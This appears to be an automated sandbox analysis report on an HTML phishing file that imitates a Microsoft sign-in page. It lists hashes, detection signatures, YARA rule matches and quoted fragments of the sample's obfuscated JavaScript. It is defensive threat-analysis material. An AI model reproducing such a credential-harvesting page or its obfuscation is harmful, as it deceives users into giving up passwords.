Loading ...

Play interactive tourEdit tour

Windows Analysis Report WireAdviceCopy.html

Overview

General Information

Sample Name:WireAdviceCopy.html
Analysis ID:502530
MD5:feac3fda3c48f172d010e11b72a559e0
SHA1:3e16ff04c51d5bb5ba2137d87f5b5a1ba72c22da
SHA256:1eb2818213e1f079ed7cf220a7eaf6f2400bf84b48a6c70cbac22eec827ab924
Infos:

Most interesting Screenshot:

Detection

HTMLPhisher
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Phishing site detected (based on favicon image match)
Yara detected HtmlPhish10
Multi AV Scanner detection for submitted file
HTML document with suspicious title
HTML document with suspicious name
Phishing site detected (based on logo template match)
Phishing site detected (based on image similarity)
Yara signature match
Invalid 'forgot password' link found
None HTTPS page querying sensitive user data (password, username or email)
No HTML title found
JA3 SSL client fingerprint seen in connection with other malware
HTML body contains low number of good links
Invalid T&C link found
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 7004 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation 'C:\Users\user\Desktop\WireAdviceCopy.html' MD5: C139654B5C1438A95B321BB01AD63EF6)
    • chrome.exe (PID: 5080 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,16858165692460713401,16581068538360347648,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1940 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
WireAdviceCopy.htmlSUSP_obfuscated_JS_obfuscatorioDetect JS obfuscation done by the js obfuscator (often malicious)@imp0rtp3
  • 0x1b46:$c8: while(!![])
  • 0x1b64:$d1: parseInt(_0x3a4da2(0x82))/0x1*(parseInt(_0x3a4da2(0xa8))/0x2)+-parseInt(_0x3a4da2(0x7e))/0x3*(parseInt(_0x3a4da2(0x91))/0x4)+-parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-
  • 0x1b83:$d1: parseInt(_0x3a4da2(0xa8))/0x2)+-parseInt(_0x3a4da2(0x7e))/0x3*(parseInt(_0x3a4da2(0x91))/0x4)+-parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-parseInt(_0x3a4da2(0x72))/0x7+
  • 0x1ba3:$d1: parseInt(_0x3a4da2(0x7e))/0x3*(parseInt(_0x3a4da2(0x91))/0x4)+-parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-parseInt(_0x3a4da2(0x72))/0x7+parseInt(_0x3a4da2(0xa4))/0x8+
  • 0x1bc2:$d1: parseInt(_0x3a4da2(0x91))/0x4)+-parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-parseInt(_0x3a4da2(0x72))/0x7+parseInt(_0x3a4da2(0xa4))/0x8+parseInt(_0x3a4da2(0x86))/0x9+-
  • 0x1be2:$d1: parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-parseInt(_0x3a4da2(0x72))/0x7+parseInt(_0x3a4da2(0xa4))/0x8+parseInt(_0x3a4da2(0x86))/0x9+-parseInt(_0x3a4da2(0x7d))/0xa*(
WireAdviceCopy.htmlJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

    Sigma Overview

    No Sigma rule has matched

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: WireAdviceCopy.htmlVirustotal: Detection: 26%Perma Link

    Phishing:

    barindex
    Phishing site detected (based on favicon image match)Show sources
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlMatcher: Template: microsoft matched with high similarity
    Yara detected HtmlPhish10Show sources
    Source: Yara matchFile source: WireAdviceCopy.html, type: SAMPLE
    Source: Yara matchFile source: 96078.0.pages.csv, type: HTML
    Phishing site detected (based on logo template match)Show sources
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlMatcher: Template: microsoft matched
    Phishing site detected (based on image similarity)Show sources
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlMatcher: Found strong image similarity, brand: Microsoft image: 96078.0.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlHTTP Parser: Invalid link: Forgot my password
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlHTTP Parser: Invalid link: Forgot my password
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlHTTP Parser: Has password / email / username input fields
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlHTTP Parser: Has password / email / username input fields
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlHTTP Parser: HTML title missing
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlHTTP Parser: HTML title missing
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlHTTP Parser: Number of links: 0
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlHTTP Parser: Number of links: 0
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlHTTP Parser: Invalid link: Terms of use
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlHTTP Parser: Invalid link: Privacy & cookies
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlHTTP Parser: Invalid link: Terms of use
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlHTTP Parser: Invalid link: Privacy & cookies
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlHTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlHTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlHTTP Parser: No <meta name="copyright".. found
    Source: file:///C:/Users/user/Desktop/WireAdviceCopy.htmlHTTP Parser: No <meta name="copyright".. found